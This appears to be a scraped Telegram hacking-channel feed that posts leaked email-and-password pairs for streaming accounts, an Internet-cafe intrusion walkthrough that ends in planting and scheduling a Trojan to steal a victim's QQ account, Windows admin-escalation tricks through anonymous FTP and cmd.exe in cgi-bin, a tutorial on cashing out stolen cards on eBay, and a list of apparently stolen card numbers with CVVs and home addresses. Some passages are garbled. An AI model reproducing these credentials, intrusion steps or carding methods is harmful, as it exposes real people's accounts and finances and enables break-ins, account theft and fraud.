UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
# SUPPORT & SHARE :

T.me/UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ UFC FightPass Premium Accounts :

chikicolon@gmail.com:6 (chikicolon@gmail.com:6)chiqui6 | Premium
kyleandjenna@gmail.com:annejm | : Premium
mickley_sw@hotmail.com:Phatn355 | Premium
frankskrobot@gmail.com:Avery2011 | Premium
colebeason2@live.com:charlet13 | Premium
kzidni@yahoo.com:Pokese1234 | Premium
thierry.stpl@gmail.com:Fucker99 | Premium
campbellconnor81@gmail.com:connor35 | Premium
snoormurray@icloud.com:Boxing33 | Premium

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Commands and techniques used for Internet cafe intrusion :
t.me/undercodeTesting

There are many Internet cafe management software, but most of them have one or other loopholes, so a lot of cracking techniques for Internet cafe software and Internet cafe software have emerged. You can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the most serious places for loss of virtual property.

> But as long as the level of the Internet cafe administrator is sufficient, this situation can be avoided. Let me tell you how I used to get the MMQQ number in Internet cafes. It's a bit complicated. The hacker base is mainly to let you know some commands used during hacking.

πŸ¦‘ 𝕃𝔼𝕋' π•Š π•Šπ•‹π”Έβ„π•‹ :


1) The first step: first determine the IP of the computer used by the MM. The number and IP address of the computer in the Internet cafe are usually the same or higher. For example, the computer with the number 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168 .0.1 is left to the router), not only that, the machine name is also regular, the machine name of computer 20 is usually Wangba20, so as long as you know the computer used by MM, and then enter the "command prompt", Ping Wangba20 can get the IP address , Such as 192.168.0.20.

2) With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use unpatched Windows 2000, and the user name for logging in to the computer is mostly an empty password in the form of "user number" Form, so at the "command prompt", enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection .

3) After the connection is successful, you must close the anti-virus software on the other computer, right-click "My Computer", select "Management", right-click "Computer Management (Local)" in the pop-up window, and select "Connect to another computer ", Connect to 192.168.0.20, start the" Telnet "service (" Computer Management "can directly manage remote computers).

3) Enter two commands under the "Command Prompt" to create a new user20 user on this machine and add it to the administrator group.

net user user20 / add

net localgroup administrators user20 / add

4) Go to C: \ Winnt \ System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", check "Run as other user" (to Run the program as another user). Run the shortcut CMD, after the "Run as other user" window pops up, enter "user20" and press Enter.

5) Use telnet 192.168.0.20 to log in to the MM computer, and then download a command-line killing software from the Internet, such as knlps, etc., and close the anti-virus software process on telnet.

6) You can download a Trojan now, and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example, 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name The .exe "command runs the Trojan at the specified time.

With the Trojan, you can naturally know the QQ number used by MM.

How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. As long as you use QQ or other software, you can select "Internet cafe mode" (Click "Login Mode" option appears after "Advanced Settings".

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Method skills for extracting administrator rights by undercode :
let s use this tutorial on winxp or vista :
t.me/undercodeTesting

πŸ¦‘ 𝕃𝔼𝕋' π•Š π•Šπ•‹π”Έβ„π•‹ :


If you have a normal user account, then there is a very simple way to get the NT Administrator account:

1) First rename logon.scr under c: winntsystem32 to logon.old backup

2) Then rename usrmgr.exe to logon.scr

3) Then restart

logon.scr is a program loaded at startup.After restarting, the previous login password input interface will not appear, but the user manager

4) At this time he has the authority to add himself to the Administrator group

Don't forget to change the file name back!

of two:

The following technology is suitable for websites that do not pay much attention to NT network security. Although it depends on luck, the technology of more people and more powerful http can also be used by higher-level personnel

πŸ¦‘ As a beginner, entering the NT network can take the following steps:

Because NT's IIS server's ftp generally allows anonymous accounts to enter, some anonymous accounts have upload permissions, we will attack such sites. Because if anonymous accounts are not allowed, it may cause clear text passwords to be transmitted online. These passwords can be intercepted with the tool of tcpspy. Now I will not talk about these more advanced technologies.

It is because of the setting that allows anonymous account ftp login, it also brings us the opportunity to break through the NT server. We use ftp to log in to an NT server, for example: www.xxx.com (example name):

as example site :
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).

ntsvr2 exposes its NETbios name, then in the context of IIS, there must be an IUSER_ntsvr2 user account, belonging to the Domain user group, this account we will use to obtain Administrator permissions

User (www.xxx.com:(none
))
: anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: enter guest @ or guest

For administrators who lack network security knowledge, many people do not ban the guest account or set a password.

Then the guest account is an available correct user account, although it only belongs to the Domain guest group. In this case, we can enter the FTP of the NT server.
After entering, try cd / c, if you are lucky, and change the directory successfully, then you have 80% certainty.

Now, start looking for the cgi-bin directory (or scripts directory), after entering, copy cmd.exe under winnt to cgi-bin, upload getadmin and gasys.dll to cgi-bin and enter: http: // www. xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

After about ten seconds, the screen displays:

CGI Error

At this time, there is a 90% possibility that you have upgraded IUSER_ntsvr2 to Administrator, that is, anyone who accesses the web site is an administrator. You can add user:
http://www.xxx.com/cgi-bin/cmd .exe? / c% 20c: winntsystem32net.exe% 20user% 20china% 20news% 20 / add

πŸ¦‘ This creates a user called china, whose password is news, and then:

http://www.xxx.com/cgi-bin/getadmin.exe?cnn

You can log in with the account of cnn, you can change the homepage of the web root directory, or you can directly modify it using the above cmd.exe method

Third:

Scan with NT's Netbios technology

nbtstat -a www.xxx.com
or
nbtstat -A www.xxx.com

This can get the shared resource name of its domain

net view \ www.xxx.com

You can get the shared resource name of its machine, if there is a c drive

net use f: \ www.xxx.com \ c $ Content $ nbsp;

You can use f: to map its c drive

net use \ 111.111.111.111 \ ipc $ Content $ nbsp; "" / user: ""

Fourth: Ported tools under Unix:

Windows xp example users can use this tcp / ip tool to capture packets in tcp / ip connection:

WinDumpxp.exe still needs to download this library Packet95.exe before use

Windows NT user version

WinDump.exe PacketNT.exe
(can try on win vist /xp/7 old v)

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘The use of Ftp command

To learn intrusion, FTP commands are indispensable. Here are some good-looking FTP commands:

The FTP command is one of the most frequently used commands by Internet users. Whether you use FTP under DOS or UNIX operating systems, you will encounter a large number of FTP internal commands. Familiar and flexible application of FTP's internal commands can greatly facilitate users and receive more with less effort. The command line format of FTP is: ftp -v -d -i -n -g [hostname], where

-v Display all the response information of the remote server;
-n Restrict automatic login of ftp, that is, not use;
.n etrc file;
-d Use debugging mode;
-g Cancel global file name.

The internal commands used by ftp are as follows (square brackets indicate optional):

1.! [Cmd [args]: Execute interactive sh \ * ll in the local machine, and exit to return to the ftp environment, such as:! Ls * .zip.

2. $ macro-ame [args]: execute macro definition macro-name.

3. account [password]: Provide the supplementary password needed to access system resources after successfully logging into the remote system.

4. append local-file [remote-file]: append the local file to the remote system host. If the remote system file name is not specified, the local file name is used.

5. ascii: Use ascii type transmission method.

6. bell: The computer rings once after each command is executed.

7. Bin: Use the binary file transfer method.

8. bye: Exit the FTP session.

9. case: When using mget, convert uppercase to lowercase letters in the remote host file name.

10. cd remote-dir: Enter the remote host directory.

11. cdup: Enter the parent directory of the remote host directory.

12. chmod mode file-name: Set the access mode of the remote host file file-name to mode, for example: chmod 777 a.out.

13. close: interrupt the ftp session with the remote server (corresponding to open).

14. cr: When using ascii to transfer files, convert the carriage return and line feed into a return line.

15. delete remote-file: delete the remote host file.

16. debug [debug-values]: Set the debugging mode to display each command sent to the remote host, such as: deb up 3, if set to 0, it means to cancel the debug.

17. dir [remote-dir] [local-file]: Display the remote host directory and save the result in the local file local-file.

18. Disconnection: Same as close.

19. Form format: Set the file transmission mode to format, and the default is file mode.

20. get remote-file [local-file]: transfer the remote-file of the remote host to the local-file of the local hard disk.

21. glob: Set the file name extension of mdelete, mget, mput. By default, the file name is not extended.

22. Hash: Each transmission of 1024 bytes displays a hash symbol (#).

23. help [cmd]: Display help information of ftp internal command cmd, such as: help get.

24. idle [seconds]: Set the sleep timer of the remote server to [seconds] seconds.

25. The image of Heyou pomegranates (scrambled together) is the same as binary).

26. lcd [dir]: switch the local working directory to dir.

27. ls [remote-dir] [local-file]: Display the remote-dir of the remote directory and store it in the local file local-file.

28. macdef macro-name: Define a macro. When a blank line under macdef is encountered, the macro definition ends.

29. mdelete [remote-file]: delete the remote host file.

30. mdir remote-files local-file: similar to dir, but you can specify multiple remote files, such as: mdir * .o. *. Zipoutfile.

31. mget remote-files: transfer multiple remote files.

32. mkdir dir-name: build a directory in the remote host.

33. mls remote-file local-file: Same as nlist, but multiple file names can be specified.

34. mode [modename]: Set the file transfer mode to modename, and the default is stream mode.

35. modtime file-name: displays the last modification time of the remote host file.

36. mput local-file: Transfer multiple files to a remote host.
37. newer file-name: If the modification time of the file-name in the remote machine is closer than the time of the file with the same name on the local hard disk, the file is retransmitted.

38. nlist [remote-dir] [local-file]: Display the file list of the remote host directory and store it in the local-file of the local hard disk.

39. nmap [inpattern outpattern]: Set the file name mapping mechanism, so that when the file is transferred, some characters in the file are converted between each other, such as: nmap $ 1. $ 2. $ 3 & 1, $ 2; .a2.a3, the file name becomes a1, a2. This command is especially applicable when the remote host is a non-UNIX machine.

40. ntrans [inchars [outchars]: Set the translation mechanism of file name characters, such as ntrans 1R, then the file name LLL will become RRR.

41. open host [port]: establish a specified ftp server connection, you can specify the connection port.

42, passive: Enter the passive transmission mode.

43. prompt: set the interactive prompt when transferring multiple files.

44. proxy ftp-cmd: In the secondary control connection, execute an ftp command, which allows connecting two ftp servers to transfer files between the two servers. The first ftp command must be open to first establish a connection between the two servers.

45. put local-file [remote-file]: transfer the local file local-file to the remote host.

46, pwd: display the current working directory of the remote host.

47. quit: Same as bye, exit ftp session.

48. quote arg1, arg2 ...: send the parameters verbatim to the remote ftp server, such as: quote syst.

49. recv remote-file [local-file]: same as get.

50. reget remote-file [local-file]: similar to get, but if the local-file exists, it will resume transmission from the place where the last transmission was interrupted.

51. rhelp [cmd-name]: Request help from the remote host.

52. rstatus [file-name]: If the file name is not specified, the status of the remote host is displayed, otherwise the status of the file is displayed.

53. Rename article source: bbs.nju.edu.cn [to]: Change the file name of the remote host.

54. reset: clear the answer queue.

55. restart marker: restart get or put from the specified marker, such as restart 130.

56, rmdir dir-name: delete the remote host directory.

57. runique: Set the unique storage of the file name. If the file exists, add the suffix .1, .2 and so on after the original file.

58, send local-file [remote-file]: Same as put.

59. sendport: Set the use of the PORT command.

60. site arg1, arg2 ...: send the parameters verbatim to the remote ftp host as a SITE command.

61. size file-name: Display the size of the remote host file, such as: site idle 7200.

62. status: displays the current ftp status.

63. struct [struct-name]: Set the file transmission structure to struct-name, and the stream structure is used by default.

64. sunique: Set the remote host file name storage to be unique (corresponding to runique).

65. system: displays the operating system type of the remote host.

66. Tenex: Set the file transfer type to the desired type of TENEX machine.

67. tick: Set the byte counter during transmission.

68. trace: Set the packet trace.

69. type [type-name]: Set the file transfer type to type-name, the default is ascii, such as: type binary, set the binary transfer mode.

70. umask [newmask]: Set the default umask of the remote server to newmask, such as umask 3.

71. user user-name [password] [account]: Show your identity to the remote host. When you need a password, you must enter the password, such as: user anonymous my @ email.

72. verbose: Same as the -v parameter on the command line, that is, to set the detailed report mode, all responses from the ftp server will be displayed to the user, and the default is on.

73.? [Cmd]: Same as help.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Cash out CVV / Fullz with eBay
fullzcvv Tutorials 0 Comments

> Using your account, you can earn up to $ 900. It can be combined with other combing methods, and then you can make more money. To successfully buy, you need an eBay account, CC / CVV2, Socks (RDP).

πŸ¦‘ instruction:

1) To get started, you need to find a store with a short order approval period. I suggest you go to the store that ships one day.

2) Then you need to use rdps (because they are not blacklisted).
If for some reason you cannot use rdps, please switch from vip72 to socks5, check the blacklist, and then recheck it on ip-score.com.
Then I suggest that you buy CC / CVV2 in the same country and state as you saw before.

3) Clear the browser completely and prepare the computer so that it will not cause suspicion and looks like the cardholder's computer.

4) Use socks5 to open the online store, move the product you need to the shopping cart and make a purchase (fill in the data from the CC purchased by others)

πŸ¦‘ Successful combing skills:

1) Use a verified account with feedback> 100 to
use a debit card.

2) Please wear the computer carefully before purchase to make it look like the cardholder's computer.
Use CC with eBay guestbook.

3) Purchase a credit card from the same country as the sock.

4) When you buy something that no one is willing to buy (online stores will want to sell unnecessary goods quickly)
, don't forget to set the same time as in the system when opening ip-score.com.


▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘VALID CC FOR TRIALS :
t.me/UndercodeTesting

5147504059695050 | 11 | 2020 | 661 | | Dan Leuchs | 14009 Gun Club Rd,| Epworth | IA | 52045-8884 | 6087928084 ||

***************************

5523930012521311 01/23 168 Robert Robinson 952 Paul Acuff Lane Loudon TN 37774

***************************

5243631024164202|01|2021|006|UNITED STATES|Seonwoo Yee|4204 172nd St|Flushing|NY|11358-2725|9173483563||

***************************

4400667713261828 10/19 848 Patricia K Olive 6560 340TH ST Stacy MN 55079-4532 UNITED STATES

***************************

5522631015034887
10/2019 197
Guitonkagya Algonquin
REVOLUCION 1014, COATZACOALCOS CENTRO, 96400
VERACRUZ Coatzacoalcos
96400 MX
(921)212-3631


Card number:4884984369409063

Name:Brooklyn White

Adress:Grand Avenue 103

Country:Switzerland

CVV:383

Exp:02/2021

*******************************

5162208645638588 05/21 971 GLEIDISON GON?ALVES RUA DOS CRAVOS ,50 AP 12 S?O PAULO / SP S?O BERNARDO DO CAMPO 09810290 BRAZIL +5511987476206

*******************************

5574473002561201 12/20 738 Fredrik Bergman John Erikssonsgatan 41A Sm?land J?nk?ping 55472 SWEDEN +46723996456

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Network filtering-restore the default settings of iptables
instagram.com/undercodeTesting

/usr/local/sbin/iptables -P INPUT ACCEPT
/usr/local/sbin/iptables -P FORWARD ACCEPT
/usr/local/sbin/iptables -P OUTPUT ACCEPT

#
# reset the default policies in the nat table.
#
/usr/local/sbin/iptables -t nat -P PREROUTING ACCEPT
/usr/local/sbin/iptables -t nat -P POSTROUTING ACCEPT
/usr/local/sbin/iptables -t nat -P OUTPUT ACCEPT

#
# flush all the rules in the filter and nat tables.
#
/usr/local/sbin/iptables -F
/usr/local/sbin/iptables -t nat -F

#
# erase all chains that's not default in filter and nat table.
#
/usr/local/sbin/iptables -X
/usr/local/sbin/iptables -t nat -X'

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁